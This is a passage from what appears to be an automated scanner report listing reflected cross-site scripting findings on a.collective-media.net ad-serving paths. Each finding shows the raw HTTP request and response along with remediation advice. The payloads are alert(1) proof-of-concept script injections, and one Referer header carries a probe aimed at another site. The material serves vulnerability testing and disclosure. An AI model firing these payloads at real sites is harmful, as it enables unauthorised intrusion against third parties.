This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ade4883<script>alert(1)</script>33df23666f7/q1.bosherald/be_ent HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;
Response
HTTP/1.1 404 Not Found Server: nginx/0.7.65 Content-Type: text/html Content-Length: 77 Date: Sat, 29 Jan 2011 05:20:04 GMT Connection: close
The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3829b(a)65fe352989c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ad3829b(a)65fe352989c/q1.bosherald/be_ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2134060438/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?;ord=2134060438? HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;
Response
HTTP/1.1 404 Not Found Server: nginx/0.7.65 Content-Type: text/html Content-Length: 313 Date: Sat, 29 Jan 2011 05:19:59 GMT Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b71ea<script>alert(1)</script>43f8c2f9671 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adb71ea<script>alert(1)</script>43f8c2f9671/q1.bosherald/be_ent_fr HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;
Response
HTTP/1.1 404 Not Found Server: nginx/0.7.65 Content-Type: text/html Content-Length: 80 Date: Sat, 29 Jan 2011 05:19:45 GMT Connection: close
The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 79356(a)67f94803f26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ad79356(a)67f94803f26/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1194202561/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=1194202561? HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;
Response
HTTP/1.1 404 Not Found Server: nginx/0.7.65 Content-Type: text/html Content-Length: 314 Date: Sat, 29 Jan 2011 05:19:51 GMT Connection: close
The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 35919(a)41f172dc609 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ad35919(a)41f172dc609/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/395221226/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=395221226? HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;
Response
HTTP/1.1 404 Not Found Server: nginx/0.7.65 Content-Type: text/html Content-Length: 309 Vary: Accept-Encoding Date: Sat, 29 Jan 2011 05:19:58 GMT Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 45058<script>alert(1)</script>44ffe6e3b74 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ad45058<script>alert(1)</script>44ffe6e3b74/q1.bosherald/ent HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;
Response
HTTP/1.1 404 Not Found Server: nginx/0.7.65 Content-Type: text/html Content-Length: 74 Date: Sat, 29 Jan 2011 05:19:55 GMT Connection: close
The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5079d(a)499f55b813b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ad5079d(a)499f55b813b/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/269011797/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=269011797? HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;
Response
HTTP/1.1 404 Not Found Server: nginx/0.7.65 Content-Type: text/html Content-Length: 310 Date: Sat, 29 Jan 2011 05:19:58 GMT Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aaa75<script>alert(1)</script>881ebad7688 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adaaa75<script>alert(1)</script>881ebad7688/q1.bosherald/ent_fr HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;
Response
HTTP/1.1 404 Not Found Server: nginx/0.7.65 Content-Type: text/html Content-Length: 77 Date: Sat, 29 Jan 2011 05:19:51 GMT Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 37e8f<script>alert(1)</script>f4b54c2c5da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ad37e8f<script>alert(1)</script>f4b54c2c5da/uol.collective/ColeHaan_MM_Openness_CMN_13109 HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;
Response
HTTP/1.1 404 Not Found Server: nginx/0.7.65 Content-Type: text/html Content-Length: 103 Date: Sat, 29 Jan 2011 05:19:56 GMT Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e3e1'-alert(1)-'04a355a249b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/bzo.847.CD39C4357e3e1'-alert(1)-'04a355a249b/ATF HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1;
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 423 Date: Fri, 28 Jan 2011 16:37:19 GMT Connection: close Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sun, 27-Feb-2011 16:37:19 GMT
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6bfb'-alert(1)-'e42c63df571 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/bzo.847.CD39C435/ATFc6bfb'-alert(1)-'e42c63df571 HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1;
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 423 Date: Fri, 28 Jan 2011 16:37:19 GMT Connection: close Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sun, 27-Feb-2011 16:37:19 GMT
4.13. http://a.collective-media.net/adj/bzo.847.CD39C435/ATF [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/bzo.847.CD39C435/ATF
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3bef0'-alert(1)-'1201f78b2ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/bzo.847.CD39C435/ATF?3bef0'-alert(1)-'1201f78b2ae=1 HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1;
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 426 Date: Fri, 28 Jan 2011 16:37:18 GMT Connection: close Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sun, 27-Feb-2011 16:37:18 GMT
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba471'-alert(1)-'37deb8ff8f3 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/bzo.847.CD39C435/ATF;sz=728x90;ord=1296226792127?ba471'-alert(1)-'37deb8ff8f3 HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; dc=dc; nadp=1
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 452 Date: Fri, 28 Jan 2011 16:37:17 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sun, 27-Feb-2011 16:37:17 GMT
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6981'-alert(1)-'6dd5f2ba05c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 449 Date: Sat, 29 Jan 2011 01:54:35 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:35 GMT
4.16. http://a.collective-media.net/adj/cm.quadbostonherald/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/cm.quadbostonherald/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aee13'-alert(1)-'fb692c92488 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 453 Date: Sat, 29 Jan 2011 01:54:33 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:33 GMT
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14682'-alert(1)-'6bd835e8910 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 450 Date: Sat, 29 Jan 2011 01:54:25 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:25 GMT
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82f9f'-alert(1)-'d6411e1a08d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 456 Date: Sat, 29 Jan 2011 01:54:16 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:16 GMT
4.19. http://a.collective-media.net/adj/cm.rev_bostonherald/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/cm.rev_bostonherald/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94cda'-alert(1)-'71a1ddadd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 459 Date: Sat, 29 Jan 2011 01:54:15 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:15 GMT
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75cbe'-alert(1)-'0e5baadaa09 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 457 Date: Sat, 29 Jan 2011 01:54:10 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:10 GMT
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98116'-alert(1)-'3c9c0ba56be was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/iblocal.revinet.bostonherald98116'-alert(1)-'3c9c0ba56be/audience;sz=300x250;ord=0.9691057777963579? HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 478 Date: Sat, 29 Jan 2011 01:54:11 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:11 GMT
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8cd63'-alert(1)-'d2cf8b42732 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/iblocal.revinet.bostonherald/audience8cd63'-alert(1)-'d2cf8b42732;sz=300x250;ord=0.9691057777963579? HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 478 Date: Sat, 29 Jan 2011 01:54:12 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:12 GMT
4.23. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/iblocal.revinet.bostonherald/audience
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6976e'-alert(1)-'f30758ceea3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/iblocal.revinet.bostonherald/audience;sz=300x250;ord=0.9691057777963579?&6976e'-alert(1)-'f30758ceea3=1 HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 482 Date: Sat, 29 Jan 2011 01:54:10 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:10 GMT
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e60f'-alert(1)-'5ce6f5d2b63 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/iblocal.revinet.bostonherald/audience;sz=300x250;ord=0.9691057777963579?1e60f'-alert(1)-'5ce6f5d2b63 HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 479 Date: Sat, 29 Jan 2011 01:54:07 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:07 GMT
